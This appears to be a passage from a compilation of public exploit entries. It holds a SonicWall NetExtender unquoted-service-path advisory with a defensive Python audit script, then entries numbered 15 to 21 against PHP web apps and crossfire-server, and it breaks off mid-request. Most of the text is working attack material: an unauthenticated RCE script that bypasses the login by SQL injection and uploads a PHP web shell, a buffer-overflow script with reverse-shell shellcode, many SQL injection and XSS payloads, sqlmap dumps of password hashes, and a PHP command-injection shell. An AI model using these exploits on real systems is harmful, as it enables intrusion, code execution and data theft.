      Title: SonicWall NetExtender windows client unquoted service path vulnerability
      Vers.: 10.2.0.300
      Down.: https://www.sonicwall.com/products/remote-access/vpn-clients/
      Advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023
      CVE ID: CVE-2020-5147 (https://nvd.nist.gov/vuln/detail/CVE-2020-5147)
      URLs: https://besteffortteam.it/sonicwall-netextender-windows-client-unquoted-service-path-vulnerability/
            https://shinnai.altervista.org/exploits/SH-029-20210109.html

      Desc.: The SonicWall NetExtender Windows client is vulnerable to an unquoted service path vulnerability, which allows a local attacker to gain elevated privileges in the host operating system. This vulnerability impacts SonicWall NetExtender Windows client version 10.2.300 and earlier.

      Poc:

      C:\>sc qc sonicwall_client_protection_svc
      [SC] QueryServiceConfig OPERAZIONI RIUSCITE

      NOME_SERVIZIO: sonicwall_client_protection_svc
              TIPO                      : 10  WIN32_OWN_PROCESS
              TIPO_AVVIO                : 2   AUTO_START
              CONTROLLO_ERRORE          : 1   NORMAL
              NOME_PERCORSO_BINARIO     : C:\Program Files\SonicWall\Client Protection Service\SonicWallClientProtectionService.exe  <-- Unquoted Service Path Vulnerability
              GRUPPO_ORDINE_CARICAMENTO :
              TAG                       : 0
              NOME_VISUALIZZATO         : SonicWall Client Protection Service
              DIPENDENZE                :
              SERVICE_START_NAME        : LocalSystem

      C:\>
      ---------------------------------------------------------------------------------------------------
      C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

      SonicWall Client Protection Service  sonicwall_client_protection_svc  C:\Program Files\SonicWall\Client Protection Service\SonicWallClientProtectionService.exe  Auto

      C:\>
      ---------------------------------------------------------------------------------------------------
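The sc and wmic output above is the manual check. As an added example, not from the advisory or from SonicWall, the Python below performs the same triage on a constructed service inventory (only the SonicWall path is the one quoted above; the other entries and the English-labelled `sc qc` sample are made up): it flags auto-start services with unquoted, space-containing paths outside C:\Windows, enumerates the candidate file names CreateProcess tries before reaching the real binary, and lists the directories whose ACLs decide whether an unprivileged user can plant one of them.

```python
import ntpath
import re

# Constructed service inventory in the shape of `wmic service get name,pathname,startmode`
# plus the start account from `sc qc`. Only the SonicWall path comes from the advisory.
SAMPLE_SERVICES = [
    {"name": "sonicwall_client_protection_svc", "start": "Auto", "account": "LocalSystem",
     "path": r"C:\Program Files\SonicWall\Client Protection Service\SonicWallClientProtectionService.exe"},
    {"name": "GoodSvc", "start": "Auto", "account": "LocalSystem",
     "path": r'"C:\Program Files\Vendor\Good Service\good.exe" -service'},
    {"name": "Spooler", "start": "Auto", "account": "LocalSystem",
     "path": r"C:\Windows\System32\spoolsv.exe"},
]

# Constructed `sc qc` output with English labels (the advisory's copy is Italian-localised).
SC_QC_SAMPLE = """\
SERVICE_NAME: sonicwall_client_protection_svc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\Program Files\\SonicWall\\Client Protection Service\\SonicWallClientProtectionService.exe
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Extract the fields audit() needs from `sc qc` output (English labels only)."""
    def field(label):
        m = re.search(r"^\s*%s\s*:\s*(.*)$" % label, text, re.M)
        return m.group(1).strip() if m else ""
    return {"name": field("SERVICE_NAME"),
            "start": "Auto" if "AUTO_START" in field("START_TYPE") else field("START_TYPE"),
            "account": field("SERVICE_START_NAME"),
            "path": field("BINARY_PATH_NAME")}


def is_unquoted_with_spaces(image_path):
    """True when the binary path is not quoted and contains a space."""
    p = image_path.strip()
    return not p.startswith('"') and " " in p


def hijack_candidates(image_path):
    """File names CreateProcess tries, in order, before it reaches the real binary.

    At each space the prefix is treated as the executable (with .exe appended when it
    has no extension); the walk stops once the prefix ends in .exe."""
    parts = image_path.strip().split(" ")
    cands = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            break
        cands.append(prefix + ".exe")
    return cands


def audit(services):
    """Flag auto-start services with unquoted space-containing paths outside C:\\Windows
    (the same filter as the wmic|findstr one-liner) and list the directories whose ACLs
    decide whether an unprivileged user can drop a candidate file there."""
    findings = []
    for svc in services:
        path = svc["path"]
        if svc["start"].lower() != "auto" or path.lower().startswith(r"c:\windows"):
            continue
        if not is_unquoted_with_spaces(path):
            continue
        cands = hijack_candidates(path)
        dirs = []
        for c in cands:
            d = ntpath.dirname(c)
            if d not in dirs:
                dirs.append(d)
        findings.append({"name": svc["name"], "account": svc["account"],
                         "candidates": cands, "dirs_to_check": dirs})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES + [parse_sc_qc(SC_QC_SAMPLE)]):
        print(f["name"], "runs as", f["account"])
        for c in f["candidates"]:
            print("   would load:", c)
```

On a live host the `dirs_to_check` list is what you feed to `icacls` (or to an `os.access(d, os.W_OK)` probe run as a low-privileged user): an unquoted path is only exploitable when one of those directories is writable by someone other than the service account, and only worth the effort when the service runs as LocalSystem or another privileged identity.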
  15. # Exploit Title: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
      # Date: 17.08.2021
      # Exploit Author: Tagoletta (Tağmaç)
      # Software Link: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html
      # Version: V 1.0
      # Tested on: Ubuntu

      import requests
      import random
      import string
      import json
      from bs4 import BeautifulSoup

      url = input("TARGET = ")
      if not url.startswith('http://') and not url.startswith('https://'):
          url = "http://" + url
      if not url.endswith('/'):
          url = url + "/"

      # PHP web shell written into the profile image upload; runs ?cmd= through system()
      payload = "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"

      session = requests.session()

      print("Login Bypass")
      request_url = url + "classes/Login.php?f=login"
      post_data = {"username": "admin' or '1'='1'#", "password": ""}
      bypassUser = session.post(request_url, data=post_data)
      data = json.loads(bypassUser.text)
      status = data["status"]

      if status == "success":
          let = string.ascii_lowercase
          shellname = ''.join(random.choice(let) for i in range(15))
          shellname = 'Tago' + shellname + 'Letta'
          print("shell name " + shellname)

          print("\nprotecting user")
          # Read the current profile so the save request keeps the existing values
          request_url = url + "?page=user"
          getHTML = session.get(request_url)
          getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
          ids = getHTMLParser.find('input', {'name': 'id'}).get("value")
          firstname = getHTMLParser.find('input', {'id': 'firstname'}).get("value")
          lastname = getHTMLParser.find('input', {'id': 'lastname'}).get("value")
          username = getHTMLParser.find('input', {'id': 'username'}).get("value")

          print("\nUser ID : " + ids)
          print("Firstname : " + firstname)
          print("Lastname : " + lastname)
          print("Username : " + username + "\n")

          print("shell uploading")
          # The profile save handler stores the "img" part under its original name without validation
          request_url = url + "classes/Users.php?f=save"
          request_headers = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary9nI3gVmJoEZoZyeA"}
          request_data = (
              "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n" + ids + "\r\n"
              "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n" + firstname + "\r\n"
              "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n" + lastname + "\r\n"
              "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n" + username + "\r\n"
              "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n"
              "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + shellname + ".php\"\r\nContent-Type: application/octet-stream\r\n\r\n" + payload + "\r\n"
              "------WebKitFormBoundary9nI3gVmJoEZoZyeA--\r\n"
          )
          upload = session.post(request_url, headers=request_headers, data=request_data)

          if upload.text == "1":
              print("- OK -")
              req = session.get(url + "?page=user")
              parser = BeautifulSoup(req.text, 'html.parser')
              find_shell = parser.find('img', {'id': 'cimg'})
              print("Shell URL : " + find_shell.get("src") + "?cmd=whoami")
          else:
              print("- NO :( -")
      else:
          print("No bypass user")
  16. # Exploit Title: Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)
      # Date: 17/08/2021
      # Exploit Author: Davide 't0rt3ll1n0' Taraschi
      # Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya
      # Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
      # Version: 1.0
      # Tested on: Linux (Ubuntu 20.04) using LAMPP

      ## Impact:
      An authenticated user may be able to read data for which they are not authorized, tamper with or destroy data, or possibly even read/write files or execute code on the database server.

      ## Description:
      All four parameters passed via POST are vulnerable:
      `fname` is vulnerable both to boolean-based blind and time-based blind SQLi
      `oname` is vulnerable both to boolean-based blind and time-based blind SQLi
      `username` is only vulnerable to time-based blind SQLi
      `status` is vulnerable both to boolean-based blind and time-based blind SQLi

      ## Remediation:
      Here is the vulnerable code:

      if($status==''){
          mysqli_query($dbcon,"update userlogin set surname='$fname', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
      }
      if(!empty($status)){
          mysqli_query($dbcon,"update userlogin set surname='$fname',status='$status', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
      }

      As you can see, the parameters described above are passed to the code without being checked, which leads to the SQLi. To patch this vulnerability, I suggest sanitizing those variables via `mysql_real_escape_string()` before they are passed to the prepared statement.

      ## Exploitation through sqlmap
      1) Log into the application (you can try the default creds 1111:admin123)
      2) Copy your PHPSESSID cookie
      3) Launch the following command:
      sqlmap --method POST -u http://$target/ghpolice/admin/savestaffedit.php --data="fname=&oname=&username=&status=" --batch --dbs --cookie="PHPSESSID=$phpsessid"
      replacing $target with your actual target and $phpsessid with the cookie you copied before

      ## PoC:
      Request:

      POST /ghpolice/admin/savestaffedit.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 77
      Origin: http://localhost
      DNT: 1
      Connection: close
      Referer: http://localhost/ghpolice/admin/user.php
      Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f
      Upgrade-Insecure-Requests: 1
      Sec-Fetch-Dest: document
      Sec-Fetch-Mode: navigate
      Sec-Fetch-Site: same-origin
      Sec-Fetch-User: ?1

      fname=' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status=

      And after 5 seconds we got:

      HTTP/1.1 200 OK
      Date: Tue, 17 Aug 2021 14:28:59 GMT
      Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
      X-Powered-By: PHP/7.4.22
      Content-Length: 1074
      Connection: close
      Content-Type: text/html; charset=UTF-8

      <!DOCTYPE html>
      etc...
17. # Exploit Title: COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections
# Date: 17-08-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: V1
# Category: Webapps
# Tested on: Linux/Windows

# Description:
# PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query. Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.

# Vulnerable Request:

    POST /check_availability.php HTTP/1.1
    Host: localhost
    Content-Length: 12
    sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
    Accept: */*
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/add-phlebotomist.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
    Connection: close

    employeeid=1

# Vulnerable Payload:
# Parameter: employeeid (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: employeeid=1' AND 2323=2323 AND 'gARj'='gARj
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload: employeeid=1' AND (SELECT 5982 FROM (SELECT(SLEEP(10)))aPnu) AND 'bDQl'='bDQl

------------------------------------------------------------------------------

# Vulnerable Request:

    POST /add-phlebotomist.php HTTP/1.1
    Host: localhost
    Content-Length: 61
    Cache-Control: max-age=0
    sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/add-phlebotomist.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
    Connection: close

    empid=1&fullname=dsadas&mobilenumber=1111111111&submit=Submit

# Vulnerable Payload:
# Parameter: empid (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload: empid=1' AND (SELECT 4626 FROM (SELECT(SLEEP(10)))jVok) AND 'bqxW'='bqxW&fullname=dsadas&mobilenumber=1111111111&submit=Submit

------------------------------------------------------------------------------

# Vulnerable Request:

    POST /edit-phlebotomist.php?pid=6 HTTP/1.1
    Host: localhost
    Content-Length: 61
    Cache-Control: max-age=0
    sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/edit-phlebotomist.php?pid=6
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
    Connection: close

    empid=1&fullname=dsadas&mobilenumber=1111111111&update=Update

# Vulnerable Payload:
# Parameter: fullname (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload: empid=1&fullname=dsadas' AND (SELECT 6868 FROM (SELECT(SLEEP(10)))yvbu) AND 'xVJk'='xVJk&mobilenumber=1111111111&update=Update

------------------------------------------------------------------------------

# Vulnerable Request:

    POST /bwdates-report-result.php HTTP/1.1
    Host: localhost
    Content-Length: 51
    Cache-Control: max-age=0
    sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/bwdates-report-ds.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
    Connection: close

    fromdate=2021-08-17&todate=2021-08-17&submit=Submit

# Vulnerable Payload:
# Parameter: fromdate (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload: fromdate=2021-08-17' AND (SELECT 6977 FROM (SELECT(SLEEP(10)))pNed) AND 'qbnJ'='qbnJ&todate=2021-08-17&submit=Submit

------------------------------------------------------------------------------

# Vulnerable Request:

    POST /search-report-result.php HTTP/1.1
    Host: localhost
    Content-Length: 27
    Cache-Control: max-age=0
    sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/search-report.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
    Connection: close

    serachdata=32&search=Search

# Vulnerable Payload:
# Parameter: serachdata (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload: serachdata=1231') AND (SELECT 1275 FROM (SELECT(SLEEP(10)))queW) AND ('HkZa'='HkZa&search=Search
# Type: UNION query
# Title: Generic UNION query (NULL) - 7 columns
# Payload: serachdata=1231') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71706b7671,0x4a6d476c4861544c4c66446b6961755076707354414d6f5150436c766f6b4a624955625159747a4d,0x7170717071),NULL,NULL-- -&search=Search
18. # Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
# Exploit Author: Khaled Salem @Khaled0x07
# Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz
# Version: 1.9.0
# Tested on: Kali Linux 2020.4
# CVE : CVE-2006-1236

    #!/bin/python
    import socket
    import time

    # Crash at 4379
    # EIP Offset at 4368
    # Badchar \x00\x20
    # ECX Size 170
    # CALL ECX 0x080640eb

    size = 4379

    # Attacker IP: 127.0.0.1 Port: 443
    shellcode = b""
    shellcode += b"\xd9\xee\xd9\x74\x24\xf4\xb8\x60\x61\x5f\x28"
    shellcode += b"\x5b\x33\xc9\xb1\x12\x31\x43\x17\x03\x43\x17"
    shellcode += b"\x83\xa3\x65\xbd\xdd\x12\xbd\xb6\xfd\x07\x02"
    shellcode += b"\x6a\x68\xa5\x0d\x6d\xdc\xcf\xc0\xee\x8e\x56"
    shellcode += b"\x6b\xd1\x7d\xe8\xc2\x57\x87\x80\xab\xa7\x77"
    shellcode += b"\x51\x3c\xaa\x77\x50\x07\x23\x96\xe2\x11\x64"
    shellcode += b"\x08\x51\x6d\x87\x23\xb4\x5c\x08\x61\x5e\x31"
    shellcode += b"\x26\xf5\xf6\xa5\x17\xd6\x64\x5f\xe1\xcb\x3a"
    shellcode += b"\xcc\x78\xea\x0a\xf9\xb7\x6d"

    try:
        filler = "\x90"*(4368 - 170) + shellcode+"\x90"*(170-len(shellcode))
        EIP = "\xeb\x40\x06\x08"
        padding = "C" * (4379 - len(filler) - len(EIP))
        payload = filler + EIP + padding
        inputBuffer = "\x11(setup sound "+ payload +"\x90\x00#"
        print("Sending Buffer with size:" + str(len(payload)))
        s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
        s.connect(("192.168.1.4",13327)) # Server IP Address: 192.168.1.4
        print(s.recv(1024))
        s.send(inputBuffer)
        s.close()
    except:
        print("Could not connect")
        exit(0)
19. # Exploit Title: Charity Management System CMS 1.0 - Multiple Vulnerabilities
# Date: 18/08/2021
# Exploit Author: Davide 't0rt3ll1n0' Taraschi
# Vendor Homepage: https://www.sourcecodester.com/users/tips23
# Software Link: https://www.sourcecodester.com/php/14908/simple-charity-website-management-system-cms-php-free-source-code.htmlpolice-crime-record-management-system.html
# Version: 1.0
# Tested on: Linux (Ubuntu 20.04) using LAMPP

## Unauthenticated reflected XSS
# Vulnerable code in '/search.php' at line 44/45:

    <?php if($count_all <= 0): ?>
    <h4 class="text-center">No Article with "<?php echo $_GET['search'] ?>" keyword found.</h4>

The content of the 'search' variable is printed on the page without being checked, leading to XSS

# PoC
Go to 'http://site.com/charity/' and in the search box input "<svg onload=alert(document.domain)>" without the double quotes, and a text box should appear

## Authenticated stored XSS
There is a stored XSS in '/charity/admin/maintenance/manage_topic.php' due to a failure to sanitize user input

# PoC
1) Login as admin
2) Go to '/maintenance/manage_topic.php'
3) In "description" insert "<svg onload=alert(document.domain)>" without the double quotes
4) Click the "save" button below
5) An alert box should appear

## POST Authenticated SQL Injection
# Vulnerable code in '/charity/classes/Master.php' at line 67

    $del = $this->conn->query("DELETE FROM `topics` where id = '{$id}'");

The $id variable is used without being checked, leading to SQLi

# PoC
Request:

    POST /charity/classes/Master.php?f=delete_topic HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 4
    Origin: http://localhost
    DNT: 1
    Connection: close
    Referer: http://localhost/charity/admin/?page=maintenance/topics
    Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin

    id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo

Response after 5 seconds (the sleep has been executed):

    HTTP/1.1 200 OK
    Date: Wed, 18 Aug 2021 14:32:13 GMT
    Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
    X-Powered-By: PHP/7.4.22
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Access-Control-Allow-Origin: *
    Content-Length: 20
    Connection: close
    Content-Type: text/html; charset=UTF-8

    {"status":"success"}

## GET Authenticated SQL Injection
# Vulnerable code in '/charity/admin/maintenance/manage_topic.php' at line 2/3

    if(isset($_GET['id']) && $_GET['id'] > 0){
        $qry = $conn->query("SELECT * from `topics` where id = '{$_GET['id']}' ");
        ...
    }

As usual, the 'id' variable is passed to the prepared statement without being checked, leading to (another) SQLi

# PoC
Similar to the previous one (same payload)

## POST Unauthenticated SQL Injection
# Vulnerable code in '/charity/classes/Login.php' at line 21

    $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");

The 'username' variable is passed without being sanitized, causing a SQLi

# PoC
Request:

    POST /charity/classes/Login.php?f=login HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 84
    Origin: http://localhost
    DNT: 1
    Connection: close
    Referer: http://localhost/charity/admin/login.php
    Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin

    username=username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo&password=password

Response after 5 seconds (the sleep has been executed):

    HTTP/1.1 200 OK
    Date: Wed, 18 Aug 2021 14:48:18 GMT
    Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
    X-Powered-By: PHP/7.4.22
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Access-Control-Allow-Origin: *
    Content-Length: 164
    Connection: close
    Content-Type: text/html; charset=UTF-8

    {"status":"incorrect","last_qry":"SELECT * from users where username = 'username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo' and password = md5('password') "}

## PHP Code Injection leads to Authenticated Remote Code Execution (RCE)
# Vulnerable code in /charity/classes/SystemSettings.php at line 37

    $qry = $this->conn->query("UPDATE system_info set meta_value = '{$value}' where meta_field = '{$key}' ");

The 'value' variable will be included in the homepage of the site without being checked, leading to RCE.

# PoC
1) Go to /charity/admin/system_info.php and in the "Welcome content" click on "Code View" at the top right.
2) At the bottom of the html code enter the following code:

    <?php if(isset($_GET['cmd'])) {system($_GET['cmd']);} ?>

3) Click the "update" button
4) Go to the home page and at the end of the url type "?cmd=$cmd" without the double quotes and replacing $cmd with the command you want to execute
5) The output should appear in the homepage
20. # Exploit Title: Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)
# Date: 19/08/2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux (Ubuntu 20.04) using LAMPP

## SQL Injection
# Vulnerable page
http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=

# Vulnerable parameter
The id parameter is vulnerable to sqli

# POC
Going to http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4'-- will throw errors on the web page.

    Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 5
    Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 10

Using sqlmap to dump the database:

    sqlmap -u "http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4" --cookie="PHPSESSIONID=83ccd78474298cd9c3ad3def1f79f2ac" -D traffic_offense_db -T users --dump

    +----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
    | id | type | avatar                        | lastname | password                                    | username | firstname    | date_added          | last_login | date_updated        |
    +----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
    | 1  | 1    | uploads/1624240500_avatar.png | Admin    | 0192023a7bbd73250516f069df18b500 (admin123) | admin    | Adminstrator | 2021-01-20 14:02:37 | NULL       | 2021-06-21 09:55:07 |
    | 9  | 2    | uploads/1629336240_avatar.jpg | Smith    | 202cb962ac59075b964b07152d234b70 (123)      | jsmith1  | John         | 2021-08-19 09:24:25 | NULL       | 2021-08-19 19:14:58 |
    +----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
21. # Exploit Title: Laundry Booking Management System 1.0 - 'Multiple' SQL Injection
# Date: 2021-08-19
# Exploit Author: Azumah Foresight Xorlali
# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14400&title=Laundry+Booking+Management+System+in+PHP+with+Free+Source+Code
# Version: Version 1.0
# Category: Web Application
# Tested on: Kali Linux

Description: Laundry Booking Management System 1.0 application is vulnerable to SQL injection via the "id" parameter, which was not properly checked on the [edit_user.php, edit_customer.php, edit_order.php] pages.

# Vulnerable Request when logged in as a user with Supervisor or Manager role:

    POST /laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7 HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7
    Content-Type: multipart/form-data; boundary=---------------------------851226474159708868105526498
    Content-Length: 1408
    Connection: close
    Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r
    Upgrade-Insecure-Requests: 1

    ---
    Parameter: id (GET)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=7' AND (SELECT 5999 FROM (SELECT(SLEEP(5)))BOpa) AND 'voSh'='voSh
    ---

-----------------------------------------------------------------------------------------------------------------------

# Vulnerable Request when logged in as Admin:

    POST /laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1 HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
